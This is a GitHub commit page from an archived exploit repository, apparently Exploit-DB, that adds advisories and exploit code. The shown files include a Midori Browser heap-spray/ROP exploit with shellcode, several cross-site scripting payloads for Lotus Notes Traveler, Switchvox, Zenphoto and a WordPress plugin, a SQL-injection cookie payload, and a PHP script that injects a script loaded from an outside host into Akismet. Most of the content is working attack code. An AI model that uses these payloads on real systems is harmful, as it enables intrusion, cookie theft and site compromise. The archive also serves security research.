This repository has been archived by the owner on Nov 28, 2022. It is now read-only.
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
35 new exploits
- Loading branch information
Offensive Security
committed
Aug 22, 2015
1 parent
6dccd55
commit 40a9571
Showing
36 changed files
with
2,207 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,132 @@ | ||
source: http://www.securityfocus.com/bid/55709/info | ||
|
||
The Midori Browser is prone to a denial-of-service vulnerability. | ||
|
||
An attacker can exploit this issue to crash the affected application, denying service to legitimate users. | ||
|
||
Midori Browser 0.3.2 is vulnerable; other versions may also be affected. | ||
|
||
|
||
it**************************** | ||
|
||
<html> | ||
<!-- ROP completed---> | ||
<head> | ||
<Title>Ubuntu 11.10 Calc p47l0d -- Rop Completed</title> | ||
<script type="text/javascript"> | ||
function ignite() { | ||
var carpet = 0x200; | ||
var vftable = unescape("\x00% u0c10"); | ||
var pLand = "% u00fd% u0c10"; | ||
var pShell = "% u0000% u0c10"; | ||
var oldProt = "% u0000% u0c10"; | ||
|
||
var heap = unescape("% u0101% u0102" | ||
+"% u0008% u0c10" | ||
+"% u0105% u0106" | ||
+"% u10c2% u7c34"//"% u0107% u0108" pop ecx;pop ecx;ret | ||
+"% u0109% u010a"// | ||
+"% u3134% u6d32"//"% u010b% u010c"//"% u6643% u6d6a" // mov eax,[esi] | ||
+"% u787f% u6d32"//"% u010d% u010e"// xchg eax,esi;aam 0ff;dec ecx;ret | ||
+"% u7b72% u6d83"//"% u010f% u0111" // pop edx;ret | ||
+"% u0000% u0c10"//% u0112% u0113" // will be popped in edx // | ||
+"% u2a30% u6d7f"//"% u0114% u0115" // mov ecx,esi;call [edx+50] | ||
+pLand//"% u0116% u0117" // Address in shellcode to land change it accordingly | ||
+"% ue8d4% u6d7f"//"% u0118% u0119" // mov [ecx],eax;pop ebp;ret | ||
+"% u011a% u011b"// will be popped in ebp | ||
+"% u1b02% u7c34"//"% u011c% u011d" // dec ecx;ret | ||
+"% u1b02% u7c34"//"% u011e% u011f" // dec ecx;ret | ||
+"% u1b02% u7c34"//"% u0120% u0121" // dec ecx;ret | ||
+"% u1b02% u7c34"//"% u0122% u0123" // dec ecx;ret | ||
+"% u4edc% u7c34"//"% u0122% u0123" // pop eax;ret | ||
+oldProt//"% u0124% u0125" // pOldProtection | ||
+"% ue8d4% u6d7f"//"% u0126% u0127" // mov [ecx],eax;pop ebp;ret | ||
+"% u4edb% u7c34"//"% u0128% u0129" // pop ebx;pop eax;ret // needed in initial phase. | ||
+"% u1b02% u7c34"//"% u012a% u012b" // dec ecx;ret | ||
+"% u1b02% u7c34"//"% u012c% u012d" // dec ecx;ret | ||
+"% u4edb% u7c34"//"% u012e% u012f" // pop ebx;pop eax;ret | ||
+"% u2643% u7c34"//"% u0130% u0131" // xchg eax,esp;pop edi;add byte ptr ds:[eax],al;pop ecx,ret | ||
+"% u0040% u0000"//"% u0132% u0133" // newProptection = PAGE_READ_WRITE_EXECUTE | ||
+"% u1b02% u7c34"//"% u0134% u0135" // dec ecx;ret | ||
+"% u1b02% u7c34"//"% u0136% u0137" // dec ecx;ret | ||
+"% ue8d4% u6d7f"//"% u0138% u0139" // mov [ecx],eax;pop ebp;ret | ||
+"% u013a% u013b"// will be popped in ebp | ||
+"% u1b02% u7c34"//"% u013c% u013d" // dec ecx;ret | ||
+"% u1b02% u7c34"//"% u013e% u013f" // dec ecx;ret | ||
+"% u1b02% u7c34"//"% u0140% u0141" // dec ecx;ret | ||
+"% u1b02% u7c34"//"% u0142% u0143" // dec ecx;ret | ||
|
||
+"% u4edc% u7c34"//"% u0144% u0145" // pop eax;ret | ||
+"% u0000% u0010"//"% u0146% u0147" // Size | ||
+"% ue8d4% u6d7f"//"% u0148% u0149" // mov [ecx],eax;pop ebp;ret | ||
+"% u014a% u014b"// Will be popped in ebp. | ||
+"% u1b02% u7c34"//"% u014c% u014d" // dec ecx;ret | ||
+"% u1b02% u7c34"//"% u014e% u014f" // dec ecx;ret | ||
+"% u1b02% u7c34"//"% u0150% u0151" // dec ecx;ret | ||
+"% u1b02% u7c34"//"% u0152% u0153" // dec ecx;ret | ||
|
||
+"% u4edc% u7c34"//"% u0144% u0145" // pop eax;ret | ||
+pShell//"% u0146% u0147" // Address Of Shellcode block to change protection. | ||
+"% ue8d4% u6d7f"//"% u0148% u0149" // mov [ecx],eax;pop ebp;ret | ||
+"% u014a% u014b"// Will be popped in ebp. | ||
/* +"% u1b02% u7c34"//"% u014c% u014d" // dec ecx;ret | ||
+"% u1b02% u7c34"//"% u014e% u014f" // dec ecx;ret | ||
+"% u1b02% u7c34"//"% u0150% u0151" // dec ecx;ret | ||
+"% u1b02% u7c34"//"% u0152% u0153" // dec ecx;ret | ||
*/ +"% u4cc1% u7c34"//"% u0154% u0155" // pop eax;ret | ||
+"% u9611% u7c34"//"% u0156% u0157" // will be popped in eax. pop edi;pop ebx;pop ebp;ret | ||
+"% u347a% u7c34"//"% u0158% u0159" // push esi;push edi;call eax | ||
+"% u4edc% u7c34"//"% u015a% u015b" // pop eax;ret | ||
+"% u00e0% u0c10"//"% u015c% u015d" // will be popped in eax. | ||
|
||
/* Need to fix the ebp for proper landing on shellcode */ | ||
+"% uc420% u6d99"// dec ebp;ret | ||
+"% uc420% u6d99"// dec ebp;ret | ||
+"% uc420% u6d99"// dec ebp;ret | ||
+"% uc420% u6d99"// dec ebp;ret | ||
|
||
|
||
+"% u1f0a% u7c34"//"% u015e% u015f" // mov esp,ecx;mov ecx[eax];mov eax,[eax+4];push eax;ret | ||
+"% u0160% u0161" | ||
+"% u28dd% u7c35"//"% u0162% u0163" // VirtualProtect | ||
+"% u0164% u0165" | ||
+"% u0166% u0167" | ||
+"% u0168% u0169" | ||
+"% u016a% u016b" | ||
+"% u016c% u016d" | ||
) | ||
/* Shellcode : */ +unescape("% u9090% u9090% u9090% u9090" | ||
+"% u585b" // pop ebx;pop eax; | ||
+"% u0a05% u0a13% u9000" // add eax,0a130a | ||
+"% u008b" // mov eax,[eax] | ||
+"% u056a" // push 05 | ||
+"% uc581% u0128% u0000" // add ebp,114 | ||
+"% u9055" // push ebp;nop | ||
+"% u1505% u04d6% u9000" // add eax,4d615 | ||
+"% ud0ff" // call eax | ||
+"% uBBBB% uCCCC% uDDDD% uEEEE" | ||
/* command: */ +"% u6163% u636c% u652e% u6578% u0000% ucccc" // calc.exe | ||
); | ||
var vtable = unescape("\x04% u0c10"); | ||
while(vtable.length < 0x10000) {vtable += vtable;} | ||
var heapblock = heap+vtable.substring(0,0x10000/2-heap.length*2); | ||
while (heapblock.length<0x80000) {heapblock += heap+heapblock;} | ||
var finalspray = heapblock.substring(0,0x80000 - heap.length - 0x24/2 - 0x4/2 - 0x2/2); | ||
var spray = new Array(); | ||
for (var iter=0;iter<carpet;iter++){ | ||
spray[iter] = finalspray+heap; | ||
} | ||
/* vulnerability trigger : */ | ||
var arrobject = [0x444444444444]; | ||
for(;true;){(arrobject[0])++;} | ||
} | ||
</script> | ||
</head> | ||
<body> | ||
<applet src="test.class" width=10 height=10></applet> | ||
<input type=button value="Object++" onclick="ignite()" /> | ||
</body> | ||
</html> | ||
|
||
********************Exploit**************************** | ||
|
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,13 @@ | ||
source: http://www.securityfocus.com/bid/55740/info | ||
|
||
IBM Lotus Notes Traveler is prone to a URI-redirection vulnerability, multiple HTML-injection vulnerabilities and cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content. | ||
|
||
Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials, to control how the site is rendered to the user and conduct phishing attacks. Other attacks are also possible. | ||
|
||
IBM Lotus Notes Traveler 8.5.3 and prior are vulnerable; other versions may also be affected. | ||
|
||
http://www.example.com/servlet/traveler?deviceType=700&redirectURL=javascript:alert(document.cookie) | ||
|
||
http://www.example.com/servlet/traveler?deviceType=700&redirectURL=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B | ||
|
||
http://www.example.com/servlet/traveler?deviceType=700&redirectURL=http://websecurity.com.ua |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,9 @@ | ||
source: http://www.securityfocus.com/bid/55689/info | ||
|
||
The ABC Test plugin for WordPress is prone to a cross-site-scripting vulnerability because it fails to properly sanitize user-supplied input. | ||
|
||
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. | ||
|
||
ABC Test 0.1 is vulnerable; other versions may also be affected. | ||
|
||
http://www.example.com/blog/wp-admin/admin.php?page=abctest&do=edit&id=%22%3E%3Ch1 %3EXSS%3C/h1 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,25 @@ | ||
source: http://www.securityfocus.com/bid/55739/info | ||
|
||
Switchvox is prone to multiple HTML-injection vulnerabilities because the application fails to properly sanitize user-supplied input. | ||
|
||
Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user. Other attacks are also possible. | ||
|
||
Switchvox 5.1.2 vulnerable; other versions may also be affected. | ||
|
||
Review: Tools -> Sound Manager -> Create sound [Description] | ||
PoC: <iframe src="http://www.vulnerability-lab.com" onload=alert(document.cookie)></iframe> | ||
|
||
Review: Tools -> SugarCRM switchboard Panel -> setup [SugarCRM Web URL] [SugarCRM SOAP URL] | ||
PoC: <iframe src="http://www.vulnerability-lab.com" onload=alert(document.cookie)></iframe> | ||
|
||
Review: Setup -> Groups -> Create Extension Group [Note] | ||
PoC: <iframe src="http://www.vulnerability-lab.com" onload=alert(document.cookie)></iframe> | ||
|
||
Review: Setup -> Outgoing calls -> Create Outgoing Call rule [Note] | ||
PoC: <iframe src="http://www.vulnerability-lab.com" onload=alert(document.cookie)></iframe> | ||
|
||
Review: Setup -> Incoming Calls -> Caller DID routes -> Create Single DID Route [Note] | ||
PoC:<iframe src="http://www.vulnerability-lab.com" onload=alert(document.cookie)></iframe> | ||
|
||
Review: Setup -> Incoming Calls -> Caller ID Rules -> Create Call transfer Call [Note] | ||
PoC: <iframe src="http://www.vulnerability-lab.com" onload=alert(document.cookie)></iframe> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,9 @@ | ||
source: http://www.securityfocus.com/bid/55746/info | ||
|
||
AlamFifa CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. | ||
|
||
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. | ||
|
||
AlamFifa CMS 1.0 Beta is vulnerable; other versions may also be affected. | ||
|
||
user_name_cookie=test' LIMIT 0,1 UNION ALL SELECT 93,93,CONCAT(0x3a6b63733a,0x50766e44664451645753,0x3a6165683a),93,93,93#; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,37 @@ | ||
source: http://www.securityfocus.com/bid/55749/info | ||
|
||
The Akismet plugin for WordPress is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. | ||
|
||
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. | ||
|
||
#!/usr/bin/php -f | ||
<?php | ||
# | ||
# legacy.php curl exploit | ||
# | ||
|
||
// | ||
// HTTP POST, | ||
// | ||
|
||
$target = $argv[1]; | ||
|
||
$ch = curl_init(); | ||
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1); | ||
curl_setopt($ch, CURLOPT_URL, | ||
"http://$target/wp-content/plugins/akismet/legacy.php"); | ||
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE | ||
5.01; Windows NT 5.0)"); | ||
curl_setopt($ch, CURLOPT_POST, 1); | ||
curl_setopt($ch, CURLOPT_POSTFIELDS, | ||
"s=%2522%253E%253Cscript%2520src%253d%2F%2Fsantanafest.com.br%2Fenquete%2Fc%253E%253C%2Fscript%253E"); | ||
curl_setopt($ch, CURLOPT_TIMEOUT, 3); | ||
curl_setopt($ch, CURLOPT_LOW_SPEED_LIMIT, 3); | ||
curl_setopt($ch, CURLOPT_LOW_SPEED_TIME, 3); | ||
curl_setopt($ch, CURLOPT_COOKIEJAR, "/tmp/cookie_$target"); | ||
$buf = curl_exec ($ch); | ||
curl_close($ch); | ||
unset($ch); | ||
|
||
echo $buf; | ||
?> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,9 @@ | ||
source: http://www.securityfocus.com/bid/55755/info | ||
|
||
Zenphoto is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input. | ||
|
||
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. | ||
|
||
Zenphoto 1.4.3.2 is vulnerable; prior versions may also be affected. | ||
|
||
http://www.example.com/zp-core/zp-extensions/zenpage/admin-news-articles.php?date=%22%3E%3Cscript%3Ealert%28%27Cookie%20sealing%20Javascript%27%29;%3C/script%3E%3C> |
Oops, something went wrong.